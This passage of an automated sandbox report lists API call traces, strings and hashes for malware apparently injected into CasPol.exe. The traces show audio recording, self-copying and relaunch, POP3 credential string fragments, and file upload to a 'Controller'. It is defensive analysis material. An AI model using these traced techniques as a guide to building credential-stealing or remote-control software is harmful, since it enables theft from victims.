                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                                                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                                                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                                                                              • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                                                                              • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                                                                              • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                                                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Write$Create
                                                                                                                                                              • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                              • API String ID: 1602526932-4212202414
                                                                                                                                                              • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                              • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                                                                              • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                              • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,PFb,00406933), ref: 004064F4
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                              • API String ID: 1646373207-165202446
                                                                                                                                                              • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                              • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                                                                              • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                              • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                                                • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                                                • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                              • _strlen.LIBCMT ref: 10001855
                                                                                                                                                              • _strlen.LIBCMT ref: 10001869
                                                                                                                                                              • _strlen.LIBCMT ref: 1000188B
                                                                                                                                                              • _strlen.LIBCMT ref: 100018AE
                                                                                                                                                              • _strlen.LIBCMT ref: 100018C8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                              • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                              • API String ID: 3296212668-3023110444
                                                                                                                                                              • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                              • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                                              • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                              • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                                              APIs
                                                                                                                                                              • _wcslen.LIBCMT ref: 0040BC75
                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                                                                              • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                                                                              • _wcslen.LIBCMT ref: 0040BD54
                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                                                                              • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                                                                              • _wcslen.LIBCMT ref: 0040BE34
                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                                              • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$PFb$del$open
                                                                                                                                                              • API String ID: 1579085052-2893736755
                                                                                                                                                              • Opcode ID: dc10b710cf19d5e546024f9218f411ba7f3a987ff1f587e32df4140d18237521
                                                                                                                                                              • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                                                                                              • Opcode Fuzzy Hash: dc10b710cf19d5e546024f9218f411ba7f3a987ff1f587e32df4140d18237521
                                                                                                                                                              • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                                                                                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                                                                                              • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                                                                                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                                                                                              • _wcslen.LIBCMT ref: 0041B2DB
                                                                                                                                                              • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041B313
                                                                                                                                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                                                                                              • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041B370
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                              • String ID: ?
                                                                                                                                                              • API String ID: 3941738427-1684325040
                                                                                                                                                              • Opcode ID: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                                                                              • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                                                                                              • Opcode Fuzzy Hash: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                                                                              • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _strlen
                                                                                                                                                              • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                              • API String ID: 4218353326-230879103
                                                                                                                                                              • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                              • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                                              • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                              • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3899193279-0
                                                                                                                                                              • Opcode ID: 46f1b41d1c336b8cd89fc341803525a38281d22734d6162bfef1eedfb722a92e
                                                                                                                                                              • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                                                                                              • Opcode Fuzzy Hash: 46f1b41d1c336b8cd89fc341803525a38281d22734d6162bfef1eedfb722a92e
                                                                                                                                                              • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                                                              • API String ID: 2490988753-744132762
                                                                                                                                                              • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                                                                              • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                                                                                              • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                                                                              • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                                                                                              APIs
                                                                                                                                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                                                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                                                                                              • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                                                                                              • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                                                                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                                              • String ID: Close
                                                                                                                                                              • API String ID: 1657328048-3535843008
                                                                                                                                                              • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                                              • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                                                                                              • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                                              • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$Info
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2509303402-0
                                                                                                                                                              • Opcode ID: 9077060aec37fc2a24c06225c8e3d33544530eed784cb91a0a423b34aeaed2a1
                                                                                                                                                              • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                                                                                              • Opcode Fuzzy Hash: 9077060aec37fc2a24c06225c8e3d33544530eed784cb91a0a423b34aeaed2a1
                                                                                                                                                              • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                                                                              • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                                                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                                                                              • API String ID: 1884690901-3066803209
                                                                                                                                                              • Opcode ID: f394d11315419b8f0f9708f62f874e78f478f36e0ca4bb55b67993b1b69a6a64
                                                                                                                                                              • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                                                                                              • Opcode Fuzzy Hash: f394d11315419b8f0f9708f62f874e78f478f36e0ca4bb55b67993b1b69a6a64
                                                                                                                                                              • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                                                                                              APIs
                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                                                                                              • _free.LIBCMT ref: 004500A6
                                                                                                                                                                • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                                              • _free.LIBCMT ref: 004500C8
                                                                                                                                                              • _free.LIBCMT ref: 004500DD
                                                                                                                                                              • _free.LIBCMT ref: 004500E8
                                                                                                                                                              • _free.LIBCMT ref: 0045010A
                                                                                                                                                              • _free.LIBCMT ref: 0045011D
                                                                                                                                                              • _free.LIBCMT ref: 0045012B
                                                                                                                                                              • _free.LIBCMT ref: 00450136
                                                                                                                                                              • _free.LIBCMT ref: 0045016E
                                                                                                                                                              • _free.LIBCMT ref: 00450175
                                                                                                                                                              • _free.LIBCMT ref: 00450192
                                                                                                                                                              • _free.LIBCMT ref: 004501AA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                              • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                              • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                                                                                              • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                              • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                                                                                              APIs
                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                              • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                              • _free.LIBCMT ref: 10007D1D
                                                                                                                                                              • _free.LIBCMT ref: 10007D32
                                                                                                                                                              • _free.LIBCMT ref: 10007D3D
                                                                                                                                                              • _free.LIBCMT ref: 10007D5F
                                                                                                                                                              • _free.LIBCMT ref: 10007D72
                                                                                                                                                              • _free.LIBCMT ref: 10007D80
                                                                                                                                                              • _free.LIBCMT ref: 10007D8B
                                                                                                                                                              • _free.LIBCMT ref: 10007DC3
                                                                                                                                                              • _free.LIBCMT ref: 10007DCA
                                                                                                                                                              • _free.LIBCMT ref: 10007DE7
                                                                                                                                                              • _free.LIBCMT ref: 10007DFF
                                                                                                                                                              Memory Dump Source
